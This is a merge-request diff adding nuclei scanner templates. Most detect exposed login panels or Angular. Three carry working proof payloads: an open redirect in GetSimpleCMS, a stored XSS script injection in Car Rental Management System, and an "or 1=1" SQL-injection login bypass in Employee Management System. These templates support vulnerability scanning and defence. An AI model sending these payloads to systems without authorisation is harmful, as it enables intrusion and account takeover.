Merge pull request #63 from hktalent/dev

Dev

Author: hktalent

config/nuclei-templates/cves/2019/CVE-2019-9915.yaml

@@ -0,0 +1,35 @@
+id: CVE-2019-9915
+
+info:
+  name: GetSimpleCMS 3.3.13 - Open Redirection
+  author: 0x_Akoko
+  severity: medium
+  description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter.
+  reference:
+    - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms
+    - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300
+    - https://www.cvedetails.com/cve/CVE-2019-9915
+    - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-9915
+    cwe-id: CWE-601
+  metadata:
+    verified: "true"
+  tags: cve,cve2019,redirect,getsimple,cms
+
+requests:
+  - raw:
+      - |
+        POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        userid={{username}}&pwd={{password}}&submitted=Login
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1

config/nuclei-templates/exposed-panels/cisco/cisco-vmanage-login.yaml

@@ -0,0 +1,27 @@
+id: cisco-vmanage-login
+
+info:
+  name: Cisco vManage Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Cisco vManage"
+  tags: panel,cisco
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<title>Cisco vManage</title>"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/jamf-login.yaml

@@ -0,0 +1,27 @@
+id: jamf-login
+
+info:
+  name: Jamf Pro Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Jamf Pro"
+  tags: panel,jamf
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '<title>Jamf Pro Login(.*)</title>'
+
+      - type: status
+        status:
+          - 401

config/nuclei-templates/exposed-panels/rundeck-login.yaml

@@ -0,0 +1,29 @@
+id: rundeck-login
+
+info:
+  name: RunDeck Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Rundeck"
+  tags: panel,rundeck
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/user/login'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Rundeck - Login</title>'
+
+      - type: word
+        part: body
+        words:
+          - 'RUNDECK ENTERPRISE - Login</title>'

config/nuclei-templates/exposed-panels/vmware-hcx-login.yaml

@@ -0,0 +1,26 @@
+id: vmware-hcx-login
+
+info:
+  name: VMware HCX Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"VMware HCX"
+  tags: panel,vmware
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/hybridity/ui/hcx-client/index.html'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>VMware HCX</title>'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/vmware-nsx-login.yaml

@@ -0,0 +1,26 @@
+id: vmware-nsx-login
+
+info:
+  name: VMware NSX Login
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png"
+  tags: panel,vmware
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login.jsp'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>VMware Appliance Management</title>'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/technologies/angular-detect.yaml

@@ -0,0 +1,32 @@
+id: angular-detect
+
+info:
+  name: Angular detect
+  author: TechbrunchFR
+  severity: info
+  description: Angular is a development platform for building mobile and desktop web applications using Typescript/JavaScript and other languages.
+  reference:
+    - https://github.com/angular/angular
+  metadata:
+    verified: true
+    shodan-query: html:"ng-version="
+  tags: technology,angular
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+
+    matchers:
+      - part: body
+        type: word
+        words:
+          - "ng-version="
+
+    extractors:
+      - type: regex
+        group: 1
+        regex:
+          - 'ng-version="([0-9.]+)"'

config/nuclei-templates/vulnerabilities/other/carrental-xss.yaml

@@ -0,0 +1,66 @@
+id: carrental-xss
+
+info:
+  name: Car Rental Management System v1.0 - Stored Cross Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    Car Rental Management System v1.0 is vulnerable to Cross Site Scripting via admin/ajax.php?action=save_category in Name and Description Parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/49546
+    - https://www.sourcecodester.com/
+  metadata:
+    verified: true
+    shodan-query: http.html:"Car Rental Management System"
+  tags: xss,cms,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /admin/ajax.php?action=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /admin/ajax.php?action=save_category HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCMJ5bh3B6m9767Em
+
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+        Content-Disposition: form-data; name="id"
+
+
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+        Content-Disposition: form-data; name="name"
+
+        </script><script>alert(document.domain)</script>
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em
+        Content-Disposition: form-data; name="description"
+
+        <script>alert(document.domain)</script>
+        ------WebKitFormBoundaryCMJ5bh3B6m9767Em--
+
+      - |
+        GET /admin/index.php?page=categories HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<p>Name: <b></script><script>alert(document.domain)</script></b>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/vulnerabilities/other/ems-sqli.yaml

@@ -0,0 +1,39 @@
+id: ems-sqli
+
+info:
+  name: Employee Management System 1.0 - SQLi Authentication Bypass
+  author: arafatansari
+  severity: high
+  description: |
+    Employee Management System Login page can be bypassed with a simple SQLi to the username parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/48882
+    - https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
+  metadata:
+    verified: true
+  tags: ems,sqli,cms,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST /process/aprocess.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mailuid=admin' or 1=1#&pwd=nuclei&login-submit=Login
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Admin Panel'
+          - 'Log Out'
+          - 'Employee Management System'
+        condition: and
+
+      - type: status
+        status:
+          - 200